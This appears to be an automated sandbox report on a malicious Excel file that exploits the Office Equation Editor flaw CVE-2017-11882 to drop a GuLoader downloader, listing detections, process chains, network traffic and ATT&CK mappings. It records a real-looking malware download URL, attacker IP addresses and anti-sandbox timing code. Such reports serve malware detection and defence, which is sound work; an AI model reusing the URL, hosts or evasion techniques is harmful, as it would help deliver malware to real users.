Loading ...

Play interactive tourEdit tour

Analysis Report MKDRPSJS9E999494993.xlsx

Overview

General Information

Sample Name:MKDRPSJS9E999494993.xlsx
Analysis ID:378980
MD5:1a40446f940b183d3d94f0e31fc8560d
SHA1:5db0c0c8d1e079b5a2d5bc2858a55ff4498c3fb3
SHA256:adfefd8b289eecc823dc6d2b2f9acf6e5a4e49db2917af74d34354ac867c3235
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to a URL shortener service
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6CC6D1DD6CDD848693426A270563C921)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: vbc.exe PID: 2692JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: vbc.exe PID: 2692JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.118, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://stdyworkfinetraistfh.dns.army/findoc/svchost.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: MKDRPSJS9E999494993.xlsxReversingLabs: Detection: 31%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: excel.exeMemory has grown: Private usage: 4MB later: 72MB
      Source: global trafficDNS query: name: is.gd
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.83.132:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.83.132:443

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49166 -> 103.141.138.118:80
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: name: is.gd
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: name: is.gd
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 31 Mar 2021 10:05:14 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 31 Mar 2021 00:01:16 GMTETag: "12000-5bec9d05b2f1c"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 16 0d 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 20 00 00 00 00 00 00 08 12 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 06 00 06 00 04 00 00 00 00 00 00 00 00 20 01 00 00 10 00 00 a9 f5 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 ee 00 00 28 00 00 00 00 10 01 00 88 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 e1 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 0a 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 09 00 00 00 10 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewIP Address: 172.67.83.132 172.67.83.132
      Source: Joe Sandbox ViewIP Address: 103.141.138.118 103.141.138.118
      Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
      Source: global trafficHTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraistfh.dns.army
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3F1BB40.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraistfh.dns.army
      Source: unknownDNS traffic detected: queries for: is.gd
      Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownHTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2

      System Summary:

      barindex
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJump to dropped file
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: MKDRPSJS9E999494993.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/25@3/2
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$MKDRPSJS9E999494993.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR34A.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: MKDRPSJS9E999494993.xlsxReversingLabs: Detection: 31%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: MKDRPSJS9E999494993.xlsxStatic file information: File size 2663936 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: MKDRPSJS9E999494993.xlsxInitial sample: OLE indicators vbamacros = False
      Source: MKDRPSJS9E999494993.xlsxInitial sample: OLE indicators encrypted = True

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040E754 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00406754 push esp; iretd 4_2_00406755
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404953 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404CDC push es; ret 4_2_00404CDE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040E754 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D60E3 push edi; retf 4_2_003D60E4
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: MKDRPSJS9E999494993.xlsxStream path 'EncryptedPackage' entropy: 7.99992439687 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
      Source: vbc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000003D84DB second address: 00000000003D84DB instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F650CADF228h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F650CADF1A9h 0x0000002e jmp 00007F650CADF21Eh 0x00000030 test di, 57D1h 0x00000035 call 00007F650CADF280h 0x0000003a call 00007F650CADF238h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D3425 rdtsc 4_2_003D3425
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544Thread sleep time: -300000s >= -30000sJump to behavior
      Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
      Source: vbc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D3425 rdtsc 4_2_003D3425
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D3039 mov eax, dword ptr fs:[00000030h]4_2_003D3039
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D2829 mov eax, dword ptr fs:[00000030h]4_2_003D2829
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D46B6 mov eax, dword ptr fs:[00000030h]4_2_003D46B6
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D33AE mov eax, dword ptr fs:[00000030h]4_2_003D33AE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D6D88 mov eax, dword ptr fs:[00000030h]4_2_003D6D88
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D33E1 mov eax, dword ptr fs:[00000030h]4_2_003D33E1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003D7BC8 mov eax, dword ptr fs:[00000030h]4_2_003D7BC8
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Spearphishing Link1Exploitation for Client Execution13Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery211Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MKDRPSJS9E999494993.xlsx32%ReversingLabsDocument-Office.Exploit.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe100%Joe Sandbox ML
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
